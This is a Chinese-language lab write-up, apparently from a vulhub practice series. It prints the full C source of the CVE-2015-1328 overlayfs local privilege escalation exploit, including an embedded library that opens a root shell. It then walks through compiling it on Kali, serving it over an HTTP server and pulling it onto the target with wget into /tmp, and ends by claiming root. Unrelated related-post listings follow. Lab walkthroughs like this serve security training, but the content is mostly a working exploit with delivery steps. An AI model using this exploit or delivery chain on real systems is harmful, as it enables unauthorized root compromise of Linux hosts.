PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure | linux/local/3427.php
PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow | linux/local/3571.php
PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite | linux/local/3572.php
Pi-hole < 4.4 - Authenticated Remote Code Execution | linux/webapps/48442.py
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation | linux/webapps/48443.py
Redis-cli < 5.0 - Buffer Overflow (PoC) | linux/local/44904.py
RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution | linux/webapps/45361.py
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1) | linux/local/46359.md
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2) | linux/local/46369.md
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit) | linux/remote/42084.rb
SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion | linux/webapps/44655.txt
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) | linux/local/47009.c
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit) | linux/webapps/41697.rb
Splunk < 7.0.1 - Information Disclosure | linux/webapps/44865.txt
systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation | linux/local/43935.txt
Tenable Appliance < 4.5 - Root Remote Code Execution | linux/remote/41892.sh
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution | linux/remote/42949.txt
UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation | linux/local/42936.md
UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape | linux/local/42937.md
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution | linux/local/46973.md
Virtualmin < 3.703 - Multiple Local/Remote Vulnerabilities | linux/remote/9143.txt
WordPress Core < 4.7.4 - Unauthorized Password Reset | linux/webapps/41963.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
利用Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
┌──(kali㉿kali)-[~/HTB/week1]
└─$ cp /usr/share/exploitdb/exploits/linux/local/37292.c .
查看一下它的内容:
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNTuser@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"static char child_stack[1024*1024];static int
child_exec(void *stuff)
{char *file;system("rm -rf /tmp/ns_sploit");mkdir("/tmp/ns_sploit", 0777);mkdir("/tmp/ns_sploit/work", 0777);mkdir("/tmp/ns_sploit/upper",0777);mkdir("/tmp/ns_sploit/o",0777);fprintf(stderr,"mount #1\n");if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lowerif (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");exit(-1);}file = ".access";chmod("/tmp/ns_sploit/work/work",0777);} else file = "ns_last_pid";chdir("/tmp/ns_sploit/o");rename(file,"ld.so.preload");chdir("/");umount("/tmp/ns_sploit/o");fprintf(stderr,"mount #2\n");if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {exit(-1);}chmod("/tmp/ns_sploit/work/work",0777);}chmod("/tmp/ns_sploit/o/ld.so.preload",0777);umount("/tmp/ns_sploit/o");
}int
main(int argc, char **argv)
{int status, fd, lib;pid_t wrapper, init;int clone_flags = CLONE_NEWNS | SIGCHLD;fprintf(stderr,"spawning threads\n");if((wrapper = fork()) == 0) {if(unshare(CLONE_NEWUSER) != 0)fprintf(stderr, "failed to create new user namespace\n");if((init = fork()) == 0) {pid_t pid =clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);if(pid < 0) {fprintf(stderr, "failed to create new mount namespace\n");exit(-1);}waitpid(pid, &status, 0);}waitpid(init, &status, 0);return 0;}usleep(300000);wait(NULL);fprintf(stderr,"child threads done\n");fd = open("/etc/ld.so.preload",O_WRONLY);if(fd == -1) {fprintf(stderr,"exploit failed\n");exit(-1);}fprintf(stderr,"/etc/ld.so.preload created\n");fprintf(stderr,"creating shared library\n");
//下面这段是我添加的注释/*lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);write(lib,LIB,strlen(LIB));close(lib);lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");if(lib != 0) {fprintf(stderr,"couldn't create dynamic library\n");exit(-1);}write(fd,"/tmp/ofs-lib.so\n",16);*/close(fd);system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");execl("/bin/su","su",NULL);
}
因为目标环境没有gcc编译器,所以凡是内容涉及到编译的都要想办法解决,这里就是直接拷贝他需要的so文件到它的/tmp目录下面,并且在本地编译好exp后上传
先定位需要的so文件
┌──(kali㉿kali)-[~/HTB/week1]
└─$ locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
编译exp:
┌──(kali㉿kali)-[~/HTB/week1]
└─$ gcc -o exp 37292.c
37292.c: In function ‘main’:
37292.c:106:12: warning: implicit declaration of function ‘unshare’ [-Wimplicit-function-declaration]106 | if(unshare(CLONE_NEWUSER) != 0)| ^~~~~~~
37292.c:111:17: warning: implicit declaration of function ‘clone’; did you mean ‘close’? [-Wimplicit-function-declaration]111 | clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);| ^~~~~| close
37292.c:117:13: warning: implicit declaration of function ‘waitpid’ [-Wimplicit-function-declaration]117 | waitpid(pid, &status, 0);| ^~~~~~~
37292.c:127:5: warning: implicit declaration of function ‘wait’ [-Wimplicit-function-declaration]127 | wait(NULL);| ^~~~┌──(kali㉿kali)-[~/HTB/week1]
└─$ ls
36337.py 37292.c exp
编译的时候报错了,但是成功生成exp了,再把需要的so文件拷贝下来:
┌──(kali㉿kali)-[~/HTB/week1]
└─$ cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so┌──(kali㉿kali)-[~/HTB/week1]
└─$ ls
36337.py 37292.c exp ofs-lib.so
然后开启一个http服务:
┌──(kali㉿kali)-[~/HTB/week1]
└─$ python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
因为这个exp是利用/tmp的目录下的文件,我们在/tmp下进行下载文件:
/tmp # wget 192.168.64.128:8888/exp
wget 192.168.64.128:8888/exp
Connecting to 192.168.64.128:8888 (192.168.64.128:8888)
exp 100% |*******************************| 17576 0:00:00 ETA
另外这里我用的kali的gcc编译的似乎提权不了,但是用ubuntu的就可以,不知道是操作系统的原因还是因为gcc版本的原因:
yu@yu-virtual-machine:/var/www/html$ gcc --version
gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.┌──(kali㉿kali)-[~/HTB/week1]
└─$ gcc --version
gcc (Debian 12.2.0-14) 12.2.0
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
最后成功提权
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nkqWSoD8-1685660171849)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601204229-ontbx8a.png)]
vulhub打靶第一周相关推荐
- 第一周Access课总结
第一周Access课总结 1:这节课学到了什么? 这节课重点学了数据库是用来干什么 做什么的 老师怕我们理解不了 用了很长时间向我们举了很多的例子 让我们终于知道了数据库是用来干嘛的了 顾名思义 数 ...
- 20162313苑洪铭 第一周作业
20162313苑洪铭 20016-2017-2 <程序设计与数据结构>第1周学习总结 教材学习内容总结 本周观看教材绪论 主要在教我建立一个简单的java程序 内容是林肯的名言 虽然看起 ...
- 大三下学期第一周总结
本周以是开学第一周了,在生活方面,生活琐事确实变多了起来.每天上课,看着老师熟悉的面庞,如履春风.感觉学习没有那么多的陌生恐惧.学习是一方面,身体锻炼不能落下.一周至少保证三小时及其以上的运动.身体是 ...
- java开放源码_开放源码的第一周:我是如何参与的,以及我学到的东西
java开放源码 by Chak Shun Yu 泽顺宇 开放源码的第一周:我是如何参与的,以及我学到的东西 (My first week of open source: how I got invo ...
- 学习进度条(第一周)
学习进度条: 第一周 所花时间(包括上课) 5h 代码量(行) 150 博客量(篇) 2 了解到的知识点 这种主要是对上学期web知识的一个回顾,进行了第一次开学测验,了解了实发项目的开环情况. ...
- python第一周小测验_Python小测试
第一周 1. 下列关于函数的描述中,正确的说法有哪些 ·函数可以是自己定义的,也可以是 Python 内置的 ·一个函数可以被重复调用多次 ·函数可以不带参数,也可以带多个参数 ·函数可以有返回值,也 ...
- 保留两位小数除法算式_北师大|五年级上册|第一周周测·小数除法(1)
北师大·五年级上册·第一周周测·小数除法(1) 一.计算题 3.6÷1.2= 0.72÷0.9= 2.6÷13= 4.8÷0.4= 4.4÷4= 0.78÷6= 7.2÷0.4= 1÷0.25= 5. ...
- python 南京大学_南京大学python课程系列笔记之python基础之第一周:走进python
1.1 python简介: 历史,特点,应用 1.2 第一个python程序: 1.输出: print(字符串) print(变量) 2.输入: varibale = input("mess ...
- 20175317 《Java程序设计》第一周学习总结
20175317 <Java程序设计>第一周学习总结 教材学习内容总结 本周学习了Java大致的开发步骤,完成了课件自带的习题. 学习了在windows与Linux系统下不同的编译方法,掌 ...
最新文章
- html5 居于页面中心,css笔记:如何让一个div居于页面正中间
- kettle大数据量读写mysql性能优化
- 查看MS-SQL的安装版本及补丁
- python 函数例子_Python3函数之例子
- 51单片机怎么显示当前时间_(进阶篇)51单片机之按键控制蜂鸣器、数码管、按键值移位显示...
- 单片机实验:交通灯控制
- 读书笔记_代码大全_第14章_组织直线型代码_第15章_使用条件语句
- Android wifi carlife,carlife可以无线连接吗?carlife蓝牙连接流程
- mysql 表与表之间的条件比对_十六年老司机笔记:MySQL性能优化之必备技能
- 对数组名取地址a和 数组首地址a
- 拆分php中 $i++ ++$i PHP中的i++与++i的区别及效率
- 中国网络游戏发展简史
- python实现调用百度图像识别api得到图片识别与检测类别和详细信息以及相关准确度
- 模型计算机微指令总表,基于微程序控制器的模型计算机设计
- java数据透视表_使用流实现Java数据透视表
- 安卓蓝牙开发(1)BLE蓝牙基础知识和一般开发流程
- MQTT-新一代物联网协议
- 安卓版c语言怎么使用教程,C语言教程最新安卓版下载v1.0-游迅网
- 25.优化算法4:求解信赖域子问题及其收敛性
- yolov5笔记(2)——训练自己的数据模型(随6.0更新)
热门文章
- corda理解(一)
- 微型计算机实验报告温度控制,温度控制实验报告.doc
- 中考不能用计算机ka,中考阅卷老师提醒:今年90%的考生,都错在这68个汉字上!...
- 可见光成像通信(Optical Camera Communication,OCC)——基于IEEE 802.15.7-2018标准的解读
- C# 妈妈再打我一下生成器
- python和c++学哪个比较好
- oralce的时间戳数据同步到hive报脏数据错误
- 《Linux系统调用:opendir,readdir,closedir,rewinddir》
- Ubuntu18重装显卡驱动
- 【前端学习之路】ES6新特性 Promise基本方法 、async函数(阮一峰老师、小马哥_老师 课程笔记)